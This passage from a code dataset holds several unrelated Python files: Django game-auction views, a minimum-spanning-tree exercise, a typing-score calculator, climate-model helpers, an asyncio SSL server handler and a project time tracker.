HttpResponseForbidden()\n\n\n# main page for Auction\n\n\ndef 
Auction(request):\n ProcessLoots()\n\n if request.user.is_authenticated:\n\n char = Character.objects.get(user=request.user)\n loots, values = doFilter(request.COOKIES)\n\n print(values)\n context = {'filter': values, 'loots': loots, 'char': char}\n\n return render(request, \"auction/BrowseAuction.html\", context=context)\n\n else:\n return HttpResponseForbidden()\n\n\ndef AuctionActive(request):\n ProcessLoots()\n\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n loots = Loot.objects.filter(character_id=char.pk).filter(active=True)\n bets = Bid.objects.filter(character_id=char.pk)\n\n local_loots = []\n for x in loots:\n local_loots.append(LocalLoot(x))\n local_bets = []\n for x in bets:\n local_bets.append(LocalBet(x))\n\n context = {'loots': local_loots, 'bets': local_bets, 'char': char}\n\n return render(request, 'auction/auction_active.html', context=context)\n else:\n return HttpResponseForbidden()\n\n\ndef AuctionCreate(request):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n items = Item.objects.filter(character_id=char.pk).filter(used=False)\n\n local_item = []\n\n for x in items:\n local_item.append(LocalItem(x))\n\n context = {'items': local_item, 'char':char}\n\n return render(request, 'auction/auction_make.html', context=context)\n else:\n return HttpResponseForbidden()\n\n\ndef AuctionFed(request):\n ProcessLoots()\n\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n logs = AuctionLog.objects.filter(character_id=char)\n\n local_log = []\n for x in logs:\n local_log.append(LocalHistory(x))\n\n context = {'logs': local_log, 'char': char}\n\n return render(request, 'auction/auction_log.html', context=context)\n\n else:\n return HttpResponseForbidden()\n\n\ndef MakeLoot(request, item_id, buy_price = 0, start_price = 0):\n if request.user.is_authenticated:\n\n current_user = request.user\n char = Character.objects.get(user=current_user)\n item = Item.objects.get(pk=item_id)\n if ValidateItem(char, item):\n\n\n\n if buy_price == 0:\n return AuctionCreate(request)\n\n this_loot = Loot.objects.create()\n this_loot.item_id = item\n this_loot.character_id = char\n this_loot.active = True\n\n if start_price > 0:\n this_loot.biddable = True\n this_loot.next_bid = start_price\n else:\n this_loot.biddable = False\n this_loot.buy_out = buy_price\n this_loot.end_time = timezone.now() + timezone.timedelta(hours=+24)\n\n this_loot.save()\n item.used = True\n item.save()\n\n return AuctionActive(request)\n\n else:\n return HttpResponseForbidden()\n\n else:\n return HttpResponseForbidden()\n\n\ndef BuyLoot(request, loot_id):\n ProcessLoots()\n\n if request.user.is_authenticated:\n\n Buyer = Character.objects.get(user=request.user)\n\n loot = Loot.objects.get(pk=loot_id)\n if not loot:\n # failed to buy race condition or smthing\n return Auction(request)\n\n if Buyer.gold < loot.buy_out:\n return Auction(request)\n\n SellLoot(Buyer, loot, loot.buy_out)\n\n return AuctionFed(request)\n\n else:\n return HttpResponseForbidden()\n\n\ndef RemoveLoot(request, loot_id):\n ProcessLoots()\n\n if request.user.is_authenticated:\n loot = Loot.objects.get(pk=loot_id)\n if not loot:\n return AuctionActive(request)\n\n if loot.character_id != Character.objects.get(user=request.user):\n return HttpResponseForbidden()\n\n bets = Bid.objects.filter(loot_id=loot)\n\n if bets:\n return 
AuctionActive(request)\n else:\n item = loot.item_id\n item.used = False\n item.save()\n loot.delete()\n return AuctionActive(request)\n\n else:\n return HttpResponseForbidden()\n\n\ndef MakeBet(request, loot_id):\n ProcessLoots()\n\n if request.user.is_authenticated:\n loot = Loot.objects.get(pk=loot_id)\n if not loot.biddable:\n return HttpResponseForbidden()\n\n new_bid = loot.next_bid\n\n if (not new_bid) or (new_bid < loot.next_bid):\n return Auction(request)\n\n char = Character.objects.get(user=request.user)\n\n if char.gold < new_bid:\n return HttpResponseForbidden()\n print(-new_bid)\n char.gold -= new_bid\n char.save()\n\n # remove previous bet\n RemoveActiveBet(loot)\n\n # make new bet\n BET = Bid.objects.create()\n BET.loot_id = loot\n BET.character_id = char\n BET.active = True\n BET.price = new_bid\n BET.save()\n\n loot.next_bid = (loot.next_bid + 1 + (new_bid // 3))\n loot.save()\n\n return AuctionActive(request)\n\n else:\n return HttpResponseForbidden()\n","repo_name":"SanjaLV/WEB_II","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24440538774","text":"def solution(n, costs):\n costs.sort(key=lambda x: x[2])\n s = set([costs[0][0]])\n answer = 0\n while len(s) != n:\n for cost in costs:\n a, b, weight = cost\n if a in s and b in s:\n continue\n if a in s or b in s:\n s.update([a, b])\n answer += weight\n break\n \n return answer\n","repo_name":"bassyu/ps","sub_path":"programmers/3_섬_연결하기.py","file_name":"3_섬_연결하기.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2891486860","text":"import distance # pip install distance\nfrom myapp.constants import BRONZE, SILVER, GOLD, NONE\nLPS_CHEATER = 10\nLPS_GOLD = 6\nLPS_SILVER = 5\nLPS_BRONZE = 3\nCHAR_SCORE = 100\nMISTAKE_SCORE = 150\nTIME_PENALTY = 50\ndef score(usertyped, actual, time):\n \"Score is exponentially bigger with word lenth and exponentially reduced by number of errors\"\n lav = distance.levenshtein(usertyped, actual) # how different user's answer from the actual sentence\n l = min(len(usertyped), len(actual))\n score_lost_from_mistakes = MISTAKE_SCORE * lav * 1.3 ** lav\n score = l * CHAR_SCORE * 1.00 ** l - score_lost_from_mistakes - time * TIME_PENALTY\n score = round(score, 0)\n gold_score = calc_medal_score(LPS_GOLD, len(actual),0)\n silver_score = calc_medal_score(LPS_SILVER, len(actual),1)\n bronze_score = calc_medal_score(LPS_BRONZE, len(actual),2)\n if len(actual) / time > LPS_CHEATER:\n \"LIKELY A CHEATER\"\n medal = NONE\n score = -1\n elif score > gold_score:\n medal = GOLD\n elif score > silver_score:\n medal = SILVER\n elif score > bronze_score:\n medal = BRONZE\n else:\n medal = NONE\n return max(score,0), medal, gold_score, silver_score, bronze_score, score_lost_from_mistakes\n\ndef calc_medal_score(lps, length, mistakes):\n expected_time = length / lps\n score = length * CHAR_SCORE * 1.00**length - MISTAKE_SCORE * mistakes * 1.3 ** mistakes - expected_time * TIME_PENALTY\n return round(score,0)","repo_name":"rasponien/UI-Typonaut","sub_path":"myapp/score_calculator.py","file_name":"score_calculator.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28498011030","text":"import numexpr as ne\nimport numpy as np\nimport torch\nimport pandas as 
pd\n\nfrom .ancil.gas_parameters import get_gas_params\nfrom .ancil.thermal_parameters import get_thermal_params\nfrom .ancil.units import Units\nfrom .constants import TCR_DBL\n\n\ndef calculate_alpha(G, G_A, T, r0, rC, rT, rA, g0, g1, iirf100_max=False):\n iirf100_val = ne.evaluate(\"abs(r0 + rC * (G-G_A) + rT * T + rA * G_A)\")\n if iirf100_max:\n iirf100_val = ne.evaluate( # noqa: F841\n \"where(iirf100_val>iirf100_max,iirf100_max,iirf100_val)\"\n )\n alpha_val = ne.evaluate(\"g0 * exp(iirf100_val / g1)\")\n return alpha_val\n\n\ndef calculate_g(a, tau):\n g1 = ne.evaluate(\n \"sum( a * tau * ( 1. - ( 1. + 100/tau ) * exp(-100/tau) ), axis = 0)\"\n )\n g0 = np.exp(-1 * np.sum(a * tau * (1.0 - np.exp(-100 / tau)), axis=0) / g1)\n return g0, g1\n\n\ndef step_concentration(\n emissions, a, dt, alpha, tau, R_old, G_A_old, PI_conc, emis2conc\n):\n decay_rate = ne.evaluate(\"1/(alpha*tau)\") # noqa: F841\n decay_factor = ne.evaluate(\"exp(-dt*decay_rate)\") # noqa: F841\n R = ne.evaluate(\n \"emissions * a / decay_rate *\\\n ( 1. - decay_factor ) + R_old * decay_factor\"\n )\n G_A = ne.evaluate(\"sum(R,axis=0)\")\n C = ne.evaluate(\"PI_conc + emis2conc * (G_A + G_A_old) / 2\")\n return C, R, G_A\n\n\ndef step_forcing(C, PI_conc, f1, f2, f3):\n logforc = ne.evaluate(\n \"f1 * where( (C/PI_conc) <= 0, 0, log(C/PI_conc) )\",\n {\"f1\": f1, \"C\": C, \"PI_conc\": PI_conc},\n )\n linforc = ne.evaluate(\"f2 * (C - PI_conc)\", {\"f2\": f2, \"C\": C, \"PI_conc\": PI_conc})\n sqrtforc = ne.evaluate(\n \"f3 * ( (sqrt( where(C<0 ,0 ,C ) ) - sqrt(PI_conc)) )\",\n {\"f3\": f3, \"C\": C, \"PI_conc\": PI_conc},\n )\n\n RF = logforc + linforc + sqrtforc\n return RF\n\n\ndef step_temperature(S_old, F, q, d, dt=1):\n decay_factor = ne.evaluate(\"exp(-dt/d)\") # noqa: F841\n S_new = ne.evaluate(\"q * F * (1 - decay_factor) + S_old * decay_factor\")\n T = ne.evaluate(\"sum( (S_old + S_new)/2, axis=0 )\")\n return S_new, T\n\n\ndef step_I(I_old, K, q, d, dt=1):\n \"\"\"Takes next time step to construct recursively the I matrix where\n\n I_{i,j} = (q/d)∫K(ti, s)exp(-(tj-s)/d)ds from 0 to tj\n\n Rows fix the timestep inside K(ti, s) and colums determine the exponential term and\n integration bounds.\n\n I_{i,j} = d * k(ti,tj) * (1 - exp(-dt/d)) + I_{i,j-1} * exp(-dt/d)\n\n Args:\n I_old (np.ndarray): column for previous time step t_{j-1} (i.e. 
at fixed ti)\n K (np.ndarray): k(ti, s) for all times s\n d (np.ndarray): (nboxes,)\n dt (float): timestep\n\n Returns:\n type: np.ndarray column for time step t_j\n \"\"\"\n decay_factor = torch.exp(-dt / d)\n I_new = q * K * (1 - decay_factor) + I_old * decay_factor\n I_new = (I_new + I_old) / 2\n return I_new\n\n\ndef step_kernel(Kj_old, I_row, q, d, dt=1):\n \"\"\"Takes next time step to construct recursively kernel matrix Kj\n\n kj(ti, tj) = kj(t_{i-1},tj) * exp(-dt/d) + (q^2 / d) * I_{i,j} * (1 - exp(-dt/d))\n\n Args:\n Kj_old (np.ndarray): row for previous time step\n I_row (np.ndarray): Description of parameter `I_new`.\n q (np.ndarray): (nboxes,)\n d (np.ndarray): (nboxes,)\n dt (float): timestep\n\n Returns:\n type: np.ndarray row for time step t_i\n\n \"\"\"\n decay_factor = torch.exp(-dt / d)\n Kj_new = Kj_old * decay_factor + q * I_row * (1 - decay_factor)\n Kj_new = (Kj_new + Kj_old) / 2\n return Kj_new\n","repo_name":"shahineb/FaIRGP","sub_path":"src/fair/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73027162933","text":"import _ssl\nimport asyncio\nimport logging\nimport multiprocessing\nimport ssl\nimport sys\nimport types\nfrom concurrent import futures\nfrom bfnet.Butterfly import Butterfly\nfrom bfnet.Net import Net\n\n\nclass ButterflyHandler(object):\n \"\"\"\n A ButterflyHandler is a class that describes what happens when a Butterfly is caught by a net.\n\n It has several methods that are automatically called at critical stages in the connection:\n - :func:`ButterflyHandler.on_connection`\n - :func:`ButterflyHandler.on_disconnect`\n\n These methods are called at the appropriate time, as their name describes.\n \"\"\"\n instance = None\n\n def __init__(self, event_loop: asyncio.AbstractEventLoop, ssl_context: ssl.SSLContext=None,\n loglevel: int=logging.DEBUG, buffer_size: int=asyncio.streams._DEFAULT_LIMIT):\n \"\"\"\n Create a new ButterflyHandler.\n\n This class should not be called directly. 
Instead, use ButterflyHandler.get_handler() to\n get a reference instead.\n\n :param event_loop: The :class:`asyncio.BaseEventLoop` to use for the server.\n :param ssl_context: The :class:`ssl.SSLContext` to use for the server.\n :param loglevel: The logging level to use.\n :param buffer_size: The buffer size to use.\n \"\"\"\n self._event_loop = event_loop\n self._server = None\n if not ssl_context:\n # This looks very similar to the code for create_default_context\n # That's because it is the code\n # For some reason, create_default_context doesn't like me and won't work properly\n self._ssl = ssl.SSLContext(protocol=ssl.PROTOCOL_SSLv23)\n # SSLv2 considered harmful.\n self._ssl.options |= ssl.OP_NO_SSLv2\n\n # SSLv3 has problematic security and is only required for really old\n # clients such as IE6 on Windows XP\n self._ssl.options |= ssl.OP_NO_SSLv3\n self._ssl.load_default_certs(ssl.Purpose.SERVER_AUTH)\n self._ssl.options |= getattr(_ssl, \"OP_NO_COMPRESSION\", 0)\n self._ssl.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)\n self._ssl.options |= getattr(_ssl, \"OP_CIPHER_SERVER_PREFERENCE\", 0)\n\n else:\n self._ssl = ssl_context\n\n self._bufsize = buffer_size\n self.default_butterfly = Butterfly\n self.default_net = Net\n\n self._executor = futures.ThreadPoolExecutor(max_workers=multiprocessing.cpu_count() * 2 + 1)\n\n self.net = None\n self.log_level = loglevel\n self.logger = logging.getLogger(\"ButterflyNet\")\n self.logger.setLevel(loglevel)\n if self.logger.level <= logging.DEBUG:\n self._event_loop.set_debug(True)\n\n self.butterflies = {}\n\n def stop(self):\n \"\"\"\n Stop a Net.\n\n This will kill all handlers, disconnect all butterflies, and unbind the server.\n \"\"\"\n self.logger.info(\"Stopping server.\")\n print(\"Stopping server.\")\n # Loop over our Butterflies.\n for _, bf in self.butterflies.items():\n assert isinstance(bf, tuple), \"bf should be a tuple (bf, fut) -> {}\".format(bf)\n # Cancel the future.\n bf[1].cancel()\n # Cancel the Butterfly.\n bf[0].stop()\n try:\n self.net.stop()\n except AttributeError:\n pass\n self._event_loop.stop()\n\n @asyncio.coroutine\n def on_connection(self, butterfly: Butterfly):\n \"\"\"\n Stub for an on_connection event.\n\n This will call the data handler, and save the result.\n\n This method is a coroutine.\n :param butterfly: The butterfly object created.\n \"\"\"\n # Begin handling.\n handler = self.begin_handling(butterfly)\n # Create a new entry in our butterfly table.\n self.butterflies[\"{}:{}\".format(butterfly.ip, butterfly.client_port)] = (butterfly, handler)\n\n @asyncio.coroutine\n def on_disconnect(self, butterfly: Butterfly):\n \"\"\"\n Stub for an on_disconnect event.\n\n This will kill the data handler.\n\n This method is a coroutine.\n :param butterfly: The butterfly object created.\n \"\"\"\n s = \"{}:{}\".format(butterfly.ip, butterfly.client_port)\n if s in self.butterflies:\n bf = self.butterflies.pop(s)\n # These are here by default - don't call super() if you modify the butterfly dict!\n assert isinstance(bf, tuple)\n assert len(bf) == 2\n bf[1].cancel()\n\n def begin_handling(self, butterfly: Butterfly):\n \"\"\"\n Begin the handler loop and start handling data that flows in.\n\n This will schedule the Net's handle() coroutine to run soon.\n :return A Future object for the handle() coroutine.\n \"\"\"\n res = self.net.handle(butterfly)\n return self._event_loop.create_task(res)\n\n def async_func(self, fun: types.FunctionType) -> asyncio.Future:\n \"\"\"\n Turns a blocking function into an async function 
by running it inside an executor.\n\n This executor is by default a :class:`~concurrent.futures.ThreadPoolExecutor`.\n :param fun: The function to run async.\n If you wish to pass parameters to this func, use\n functools.partial (https://docs.python.org/3/library/functools.html#functools.partial).\n :return: A :class:`~asyncio.Future` object for the function.\n \"\"\"\n future = self._event_loop.run_in_executor(self._executor, fun)\n return future\n\n def async_and_wait(self, fun: types.FunctionType):\n \"\"\"\n Turns a blocking function into an async function by running it inside an executor. It then uses\n :func:`~asyncio.wait_for` to wait for the Future to complete.\n\n This executor is by default a :class:`~concurrent.futures.ThreadPoolExecutor`.\n :param fun: The function to run async.\n If you wish to pass parameters to this func, use\n functools.partial (https://docs.python.org/3/library/functools.html#functools.partial).\n :return: The result of the function.\n \"\"\"\n future = self.async_func(fun)\n return (yield from asyncio.wait_for(future, loop=self._event_loop))\n\n def create_task(self, coro: types.FunctionType):\n \"\"\"\n Create a new task on the event loop, and return the :class:`~asyncio.Future` created.\n :param coro: A coroutine or future to add.\n :return: The Future created.\n \"\"\"\n future = self._event_loop.create_task(coro)\n return future\n\n def call_soon(self, coro: types.FunctionType, *args):\n \"\"\"\n Call a coroutine or Future as soon as possible on the event loop.\n :param coro: The coroutine or Future to call.\n :param args: The arguments to the callback.\n \"\"\"\n handle = self._event_loop.call_soon(coro, args)\n return handle\n\n def set_executor(self, executor: futures.Executor):\n \"\"\"\n Set the default executor for use with async_func.\n :param executor: A :class:`~concurrent.futures.Executor` to set as the executor.\n \"\"\"\n self._executor = executor\n\n def _load_ssl(self, ssl_options: tuple):\n \"\"\"\n Internal call used to load SSL parameters from the SSL option tuple.\n\n Do not touch.\n :param ssl_options: The SSL options to use.\n \"\"\"\n try:\n self._ssl.load_cert_chain(certfile=ssl_options[0], keyfile=ssl_options[1], password=ssl_options[2])\n except IOError as e:\n self.logger.error(\"Unable to load certificate files: {}\".format(e))\n self.stop()\n\n @classmethod\n def get_handler(cls, loop: asyncio.AbstractEventLoop, ssl_context: ssl.SSLContext=None,\n log_level: int=logging.INFO, buffer_size: int=asyncio.streams._DEFAULT_LIMIT):\n \"\"\"\n Get the instance of the handler currently running.\n\n :param loop: The :class:`asyncio.BaseEventLoop` to use for the server.\n :param ssl_context: The :class:`ssl.SSLContext` to use for the server.\n :param log_level: The logging level to use.\n :param buffer_size: The buffer size to use.\n \"\"\"\n if not cls.instance:\n cls.instance = cls(loop, ssl_context, log_level, buffer_size)\n return cls.instance\n\n def butterfly_factory(self):\n \"\"\"\n Create a new :class:`Butterfly` instance.\n\n This method will create a new Butterfly from the default Butterfly\n creator specified by self.default_butterfly.\n\n Override this if you use a different constructor in your Butterfly.\n :return:\n \"\"\"\n bf = self.default_butterfly(loop=self._event_loop, bufsize=self._bufsize, handler=self)\n return bf\n\n @asyncio.coroutine\n def create_server(self, bind_options: tuple, ssl_options: tuple) -> Net:\n \"\"\"\n Create a new server using the event loop specified.\n\n This method is a coroutine.\n :param 
bind_options: The IP and port to bind to on the server.\n :param ssl_options: A tuple of SSL options:\n - The certificate file to use\n - The private key to use\n - The private key password, or None if it does not have a password.\n :return: A :class:`bfnet.Net.Net` object.\n \"\"\"\n\n # Load SSL.\n self._load_ssl(ssl_options)\n\n # Create the server.\n host, port = bind_options\n self._server = yield from self._event_loop.create_server(self.butterfly_factory, host=host, port=port,\n ssl=self._ssl)\n # Create the Net.\n # Use the default net.\n self.net = self.default_net(ip=host, port=port, loop=self._event_loop, server=self._server)\n self.net._set_bf_handler(self)\n # Create a signal handler.\n if sys.platform != \"win32\":\n self._event_loop.add_signal_handler(15, self.stop)\n return self.net\n\n\nButterflyHandler.get_handler.__annotations__['return'] = ButterflyHandler\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/SunDwarf_ButterflyNet/ButterflyNet-master/bfnet/BFHandler.py","file_name":"BFHandler.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"74865417653","text":"import os\nimport json\nfrom timer import td_str\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom config import get_base_path\nfrom functions import listOfDates\nfrom ColourText import format_text\nfrom compress_json import json_unzip, json_zip, ZIPJSON_KEY\n\n\nclass Projects:\n def __init__(self, file=\"projects.json\"):\n \"\"\"\n :param file: filename to save and load project data from. File has to be located in the base directory\n \"\"\"\n\n self.__dict = {}\n self.path = os.path.join(get_base_path(), file)\n self.exported_path = os.path.join(get_base_path(), \"Exported\")\n self.__status_tags = [\"active\", \"paused\", \"complete\"]\n\n self.__load()\n\n # run a backup at the end of every month\n\n # if the year is not the same as the year from the last save date,\n # save all the projects of the last year to an archives file\n last_save_date = self.__last_save_date()\n if last_save_date.year != datetime.today().year:\n archive_dir = os.path.join(get_base_path(), \"Archives\")\n archive_file = os.path.join(archive_dir, f\"Projects-{last_save_date.year}.json\")\n\n if not os.path.isdir(archive_dir):\n os.mkdir(archive_dir)\n\n if not os.path.exists(archive_file):\n prjct_json = json.dumps(self.__dict, indent=4)\n with open(archive_file, \"w\") as json_writer:\n json_writer.write(prjct_json)\n\n # empty dict and save\n self.__dict.clear()\n self.__save()\n\n print(f\"Archived {last_save_date.year} projects to \"\n f\"'Projects-{last_save_date.year}.json' in the Archives directory ({archive_dir}).\")\n\n def __str__(self):\n return str(self.__dict)\n\n def __len__(self):\n return len(self.__dict)\n\n def get_keys(self):\n \"\"\"\n :return: a list of all the existing project names\n \"\"\"\n return list(self.__dict.keys())\n\n def get_project(self, name: str):\n \"\"\"\n Return a project dictionary.\n :param name: existing project name\n :return: project dict object\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! 
'{name}' does not exist!\")\n return\n\n return self.__dict[name]\n\n def __last_save_date(self):\n dates = [datetime.strptime(self.__dict[project]['Last Updated'], \"%m-%d-%Y\") for project in self.__dict]\n dates.sort()\n\n if len(dates) == 0:\n return datetime.today()\n\n return dates[-1]\n\n def delete_project(self, name: str):\n \"\"\"\n Delete an existing project\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n self.__dict.pop(name)\n self.__save()\n\n def rename_project(self, name: str, new_name: str):\n \"\"\"\n Rename existing project\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n # proj_data = self.get_project(name)\n # self.delete_project(name)\n self.__dict[new_name] = self.__dict.pop(name)\n self.__save()\n\n def rename_subproject(self, name: str, sub_name: str, new_sub_name: str):\n \"\"\"\n Rename existing subproject\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n if sub_name not in self.__dict[name]['Sub Projects']:\n print(f\"Invalid subproject name! '{sub_name}' does not exist!\")\n return\n\n # rename 'Sub Projects' keys\n if new_sub_name in self.__dict[name]['Sub Projects']:\n print(f\"Subproject name '{new_sub_name}' already exists, merging subprojects...\")\n # merge the subprojects\n self.__dict[name]['Sub Projects'][new_sub_name] += self.__dict[name]['Sub Projects'].pop(sub_name)\n else:\n self.__dict[name]['Sub Projects'][new_sub_name] = self.__dict[name]['Sub Projects'].pop(sub_name)\n\n # rename all the subproject entries in the session history\n for index in range(len(self.__dict[name]['Session History'])):\n self.__dict[name]['Session History'][index]['Sub-Projects'] = \\\n [new_sub_name if x == sub_name else x for x in\n self.__dict[name]['Session History'][index]['Sub-Projects']]\n\n self.__save()\n\n def remove_subproject(self, name, sub_name):\n project = self.get_project(name)\n if sub_name not in project['Sub Projects']:\n print(f\"Invalid subproject name! 
'{sub_name}' does not exist!\")\n return\n\n old_total_time = project['Total Time']\n\n # remove session history entries with the subproject IF the subproject is the only one in the entry\n for session in project['Session History']:\n if len(session['Sub-Projects']) == 1 and sub_name in session['Sub-Projects']:\n project['Session History'].remove(session)\n # otherwise, remove the subproject from the entry\n elif len(session['Sub-Projects']) > 1 and sub_name in session['Sub-Projects']:\n session['Sub-Projects'].remove(sub_name)\n else: # do nothing\n pass\n\n # update the total time\n project['Total Time'] = 0\n for session in project['Session History']:\n project['Total Time'] += float(session['Duration'])\n\n project['Total Time'] = round(project['Total Time'], 2)\n\n # remove the subproject from the project dict\n project['Sub Projects'].pop(sub_name)\n\n print(format_text(f\"Removed subproject [_text256_26_]{sub_name}[reset] from project [bright red]{name}[reset]\"))\n print(format_text(f\"Total time for project [bright red]{name}[reset] is now \"\n f\"[_text256_34_]{round(project['Total Time']/60, 2)} hours[reset], \"\n f\"from [_text256_34_]{round(old_total_time/60, 2)} hours[reset]\"))\n # update and save dict\n self.__dict[name] = project\n self.__save()\n\n def print_json_project(self, name: str):\n project = self.get_project(name)\n print(json.dumps(project, indent=4))\n\n def create_project(self, name: str, sub_names=None):\n \"\"\"\n Create a new project.\n\n :param name: project name\n :param sub_names: names of the project's subprojects if any.\n \"\"\"\n if name not in self.__dict:\n sub_projects = {}\n\n if sub_names is not None:\n for sub_name in sub_names:\n sub_projects[sub_name] = 0.0\n\n self.__dict[name] = {\n 'Start Date': datetime.today().strftime(\"%m-%d-%Y\"),\n 'Last Updated': datetime.today().strftime(\"%m-%d-%Y\"),\n 'Total Time': 0.0,\n 'Status': self.__status_tags[0],\n 'Sub Projects': sub_projects,\n 'Session History': []\n }\n self.__save()\n return True\n\n def update_project(self, session_out: tuple, name: str, sub_names=None,\n update_date=datetime.today().strftime(\"%m-%d-%Y\")):\n \"\"\"\n Save project session history.\n\n :param session_out: a tuple with the session info including duration, session note, start and end time\n :param name: project to update\n :param sub_names: list of session subprojects\n :param update_date: date the project was tracked. set to current date by default.\n \"\"\"\n\n if name not in self.__dict:\n print(f\"Invalid project name! 
'{name}' does not exist!\")\n return\n\n duration = session_out[0]\n session_note = session_out[1]\n\n if type(session_out[2]) is not datetime:\n start_time = datetime.fromtimestamp(session_out[2]).strftime('%X')\n end_time = datetime.fromtimestamp(session_out[3]).strftime('%X')\n else:\n start_time = session_out[2].strftime('%X')\n end_time = session_out[3].strftime('%X')\n\n total_time = float(self.__dict[name]['Total Time']) + duration\n self.__dict[name]['Total Time'] = round(total_time, 2)\n\n if sub_names is not None:\n sub_projects = dict(self.__dict[name]['Sub Projects'])\n\n for sub_name in sub_names:\n if sub_name in sub_projects:\n total = float(sub_projects[sub_name])\n sub_projects[sub_name] = round(total + duration, 2)\n else:\n sub_projects[sub_name] = duration\n\n self.__dict[name]['Sub Projects'] = sub_projects\n\n self.__dict[name]['Last Updated'] = update_date if \\\n datetime.strptime(update_date, \"%m-%d-%Y\") > \\\n datetime.strptime(self.__dict[name]['Last Updated'], \"%m-%d-%Y\") \\\n else self.__dict[name]['Last Updated']\n\n history_log = {\n \"Date\": update_date,\n \"Start Time\": start_time,\n \"End Time\": end_time,\n \"Sub-Projects\": sub_names,\n \"Duration\": round(duration, 2),\n \"Note\": session_note\n }\n\n try:\n self.__dict[name]['Session History'].append(history_log)\n except KeyError:\n self.__dict[name]['Session History'] = [history_log]\n\n self.__save()\n\n def track(self, start_time, end_time, project, sub_projects, session_note):\n \"\"\"\n Track a session that wasn't recorded in real-time.\n\n :param start_time: session start time format: \"MM-DD-YYYY HH:MM\" if MM-DD-YYYY\n is not specified, track for the current day\n\n :param end_time: session end time format: \"MM-DD-YYYY HH:MM\" if MM-DD-YYYY\n is not specified, track for the current day\n\n :param project: project name\n :param sub_projects: session subprojects\n :param session_note: session note\n \"\"\"\n\n def check_date(time):\n # check if date is specified in the time string, if not set it to today\n if len(time.split(\" \")) == 1: # if only time is specified\n time = datetime.strptime(time, '%H:%M')\n time = time.replace(year=datetime.today().year, month=datetime.today().month, day=datetime.today().day)\n return time\n else:\n return datetime.strptime(time, '%m-%d-%Y %H:%M')\n\n def check_year(time):\n time = check_date(time)\n if time.year != datetime.today().year:\n print(format_text(f\"Year entered as [cyan]{time.year}[reset]. \"\n f\"Did you mean [cyan]{datetime.today().year}[reset]?\"))\n confirm = input(\"[Y/N]: \")\n if confirm.lower() == 'y':\n time = time.replace(year=datetime.today().year)\n return time\n\n start_time = check_year(start_time.strip())\n end_time = check_year(end_time.strip())\n\n update_date = end_time.strftime(\"%m-%d-%Y\")\n duration = end_time - start_time\n duration = duration.total_seconds() / 60\n\n if project not in self.__dict:\n x = input(format_text(f\"'[bright red]{project}[reset]' does not exist. Create it? \\n[Y/N]: \"))\n if x in [\"Y\", \"y\"]:\n self.create_project(project, sub_projects)\n else:\n return\n\n project_status = self.__dict[project]['Status']\n if project_status != \"active\":\n print(format_text(f\"Cannot start a timer for a '[bright magenta]{project_status}[reset]' project.\"))\n return\n\n for sub_proj in sub_projects:\n if sub_proj not in self.__dict[project]['Sub Projects']:\n x = input(format_text(f\"Sub-project '[_text256_26_]{sub_proj}[reset]' does not exist. \"\n f\"Create it? 
\"\n f\"\\n[Y/N]: \")\n )\n if x not in [\"Y\", \"y\"]:\n return\n\n if duration < 0:\n print(format_text(f\"Invalid session time. End time cannot be before start time.\"))\n return\n\n self.update_project((duration, session_note, start_time, end_time), project, sub_projects, update_date)\n\n sub_projects = [f\"[_text256_26_]{sub_proj}[reset]\" for sub_proj in sub_projects]\n\n duration = str(timedelta(minutes=duration)).split('.')[0]\n duration = datetime.strptime(duration, \"%H:%M:%S\")\n if duration.hour > 0:\n duration = duration.strftime(\"%Hh %Mm\")\n else:\n duration = duration.strftime(\"%Mm %Ss\")\n\n print(format_text(f\"Tracked [bright red]{project}[reset] \"\n f\"{sub_projects} from [cyan]{start_time.strftime('%X')}[reset]\"\n f\" to [cyan]{end_time.strftime('%X')}[reset] \"\n f\"[_text256_34_]({duration})[reset]\"), end=\"\")\n\n print(format_text(f\" -> [yellow]{session_note}[reset]\" if session_note != \"\" else \"\"))\n\n def merge(self, project1: dict, project2: dict, new_name: str):\n try:\n # get all the keys from both projects and initially set them to 0\n subs = {**project1['Sub Projects'], **project2['Sub Projects']}\n new_subs = {}\n for key in subs:\n new_subs[key] = 0.0\n\n merged_project = {\n 'Start Date': project1['Start Date'] if\n datetime.strptime(project1['Start Date'], '%m-%d-%Y') < datetime.strptime(project2['Start Date'],\n '%m-%d-%Y')\n else project2['Start Date'],\n\n 'Last Updated': project1['Last Updated'] if\n datetime.strptime(project1['Last Updated'], '%m-%d-%Y') > datetime.strptime(project2['Last Updated'],\n '%m-%d-%Y')\n else project2['Last Updated'],\n\n \"Status\": project1['Status'],\n\n \"Total Time\": 0.0,\n\n \"Sub Projects\": new_subs,\n\n \"Session History\": sorted(\n [ # combine session histories and sort by date\n *project1['Session History'],\n *project2['Session History']\n ],\n # sort array by date and end time\n key=lambda x: (datetime.strptime(x['Date'], '%m-%d-%Y'),\n datetime.strptime(x[\"End Time\"], \"%H:%M:%S\")\n )\n ),\n }\n\n merged_project = self.__remove_duplicate_sessions(merged_project)\n\n self.__dict[new_name] = merged_project\n self.__save()\n except Exception as e:\n print(f\"An error occurred when trying to merge: {e}\")\n\n def backup(self):\n \"\"\"\n Creates a backup of the projects file.\n :return: path to the backup file or False if an error occurred\n 